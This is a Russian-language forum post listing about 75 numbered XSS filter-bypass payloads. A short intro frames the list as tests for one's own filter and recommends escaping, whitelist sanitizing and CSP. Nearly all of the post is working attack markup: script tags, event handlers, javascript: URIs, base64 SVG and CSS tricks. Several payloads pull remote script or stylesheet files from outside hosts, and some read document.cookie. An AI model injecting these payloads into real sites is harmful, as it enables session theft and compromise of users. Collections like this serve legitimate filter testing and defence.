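Решил собрать некоторые байпассы XSS-фильтров; предлагаю дополнять эту тему. Заметная часть векторов ниже (expression(), DYNSRC/LOWSRC, BGSOUND, -moz-binding, условные комментарии IE) срабатывает только в устаревших браузерах, поэтому список полезен прежде всего как набор тестов для проверки собственного фильтра. То, что чёрный список блокирует отдельные строки из него, ещё не говорит о защите в целом: надёжнее контекстное экранирование вывода, санитайзер по белому списку и CSP.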
Payload #1:
Код:
<svg xml:base="data:image/svg+xml;base64,
PHN2ZyBpZD0icmVjdGFuZ2xlIiB4bWxucz0iaHR0cD
ovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhs
aW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW
5rIiAgICB3aWR0aD0iMTAwIiBoZWlnaHQ9IjEwMCI+
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg0KIDxmb3
JlaWduT2JqZWN0IHdpZHRoPSIxMDAiIGhlaWdodD0i
NTAiDQogICAgICAgICAgICAgICAgICAgcmVxdWlyZW
RFeHRlbnNpb25zPSJodHRwOi8vd3d3LnczLm9yZy8x
OTk5L3hodG1sIj4NCgk8ZW1iZWQgeG1sbnM9Imh0dH
A6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiIHNyYz0i
amF2YXNjcmlwdDphbGVydChsb2NhdGlvbikiIC8+DQ
ogICAgPC9mb3JlaWduT2JqZWN0Pg0KPC9zdmc+">
<use xlink:href="#rectangle" />
</svg>
Payload #2:
Код:
<svg>
<a href>
<animate attributeName="href" from="javascript:alert(1)" to="javascript:alert(1)" ></animate>
<circle r=50></circle>
</a>
</svg>
Payload #3:
Код:
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
Payload #4:
Код:
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)> <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script> <script>alert(document.cookie)</script>"> <img/id="confirm(1)"/alt="/"src="/"onerror=eval(id)>'"> <img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg">
Payload #5:
Код:
<IMG SRC="javascript:alert('XSS');">
Payload #6:
Код:
<IMG SRC=javascript:alert('XSS')>
Payload #7:
Код:
<IMG SRC=JaVaScRiPt:alert('XSS')>
Payload #8:
Код:
<IMG SRC=javascript:alert("XSS")>
Payload #9:
Код:
<IMG SRC=`javascript:alert("XSS")`>
Payload #10:
Код:
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
Payload #11:
Код:
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
Payload #12:
Код:
<IMG SRC=# onmouseover="alert('xxs')">
Payload #13:
Код:
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
Payload #14:
Код:
<img src=x onerror="javascript:alert('XSS')">
Payload #15:
Код:
<IMG SRC=javascript:alert( 'XSS')>
Payload #16:
Код:
<IMG SRC=javascript:a& #0000108ert('XSS')>
Payload #17:
Код:
<IMG SRC=javascript:alert('XSS')>
Payload #18:
Код:
<IMG SRC="jav ascript:alert('XSS');">
Payload #19:
Код:
<IMG SRC="jav ascript:alert('XSS');">
Payload #20:
Код:
<IMG SRC="jav
ascript:alert('XSS');">
Payload #21:
Код:
jav
ascript:alert('XSS');
Payload #22:
Код:
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Payload #23:
Код:
<<SCRIPT>alert("XSS");//<</SCRIPT>
Payload #24:
Код:
<SCRIPT SRC=http://xss.rocks/xss.js?< B >
Payload #25:
Код:
<IMG SRC="javascript:alert('XSS')"
Payload #26:
Код:
<iframe src=http://xz.ru:1337/scriptlet.html <
Payload #27:
Код:
<BODY BACKGROUND="javascript:alert('XSS')">
Payload #28:
Код:
<IMG DYNSRC="javascript:alert('XSS')">
Payload #29:
Код:
<IMG LOWSRC="javascript:alert('XSS')">
Payload #30:
Код:
<style>li {list-style-image: url("javascript:alert('XSS')");}</style><UL><LI>XSS</br>
Payload #32:
Код:
<BGSOUND SRC="javascript:alert('XSS');">
Payload #33:
Код:
<BR SIZE="&{alert('XSS')}">
Payload #34:
Код:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
Payload #35:
Код:
<LINK REL="stylesheet" HREF="http://xz.ru:1337/xss.css">
Payload #36:
Код:
<STYLE>@import'http://xz.ru:1337/xss.css';</STYLE>
Payload #37:
Код:
<META HTTP-EQUIV="Link" Content="<http://xz.ru:1337/xss.css>; REL=stylesheet">
Payload #38:
Код:
<STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE>
Payload #39:
Код:
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
Payload #40:
Код:
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
Payload #41:
Код:
exp/*<A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
Payload #42:
Код:
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
Payload #43:
Код:
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
Payload #44:
Код:
¼script¾alert(¢XSS¢)¼/script¾
Payload #45:
Код:
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
Payload #46:
Код:
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
Payload #47:
Код:
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
Payload #48:
Код:
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
Payload #49:
Код:
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
Payload #50:
Код:
<TABLE BACKGROUND="javascript:alert('XSS')">
Payload #51:
Код:
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
Payload #52:
Код:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Payload #53:
Код:
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
Payload #54:
Код:
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
Payload #55:
Код:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
Payload #56:
Код:
<DIV STYLE="width: expression(alert('XSS'));">
Payload #57:
Код:
<!--[if gte IE 4]> <SCRIPT>alert('XSS');</SCRIPT> <![endif]-->
Payload #58:
Код:
<BASE HREF="javascript:alert('XSS');//">
Payload #59:
Код:
<OBJECT TYPE="text/x-scriptlet" DATA="http://xz.ru:1337/scriptlet.html"></OBJECT>
Payload #60:
Код:
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
Payload #62:
Код:
<HTML><BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY></HTML>
Payload #63:
Код:
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
Payload #64:
Код:
<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>
Payload #65:
Код:
<input onfocus=write(1) autofocus>
Payload #66:
Код:
<video poster=javascript:alert(1)//></video>
Payload #67:
Код:
<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>
Payload #68:
Код:
<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>
Payload #69:
Код:
<video><source onerror="alert(1)">
Payload #70:
Код:
<iframe srcdoc="<img src=x:x onerror=alert(1)>" />
Payload #71:
Код:
<picture><source srcset="x"><img onerror="alert(1)"></picture>
Payload #72:
Код:
<iframe srcdoc="<svg onload=alert(1)>⃒"></iframe>
Payload #73:
Код:
<details open ontoggle="alert(1)">
Payload #74:
Код:
<img[a]src=x[d]onerror[c]=[e]"alert(1)">
Payload #75:
Код:
<tagname someattribute1=value onSomeEvent="var x=10;alert(x); ">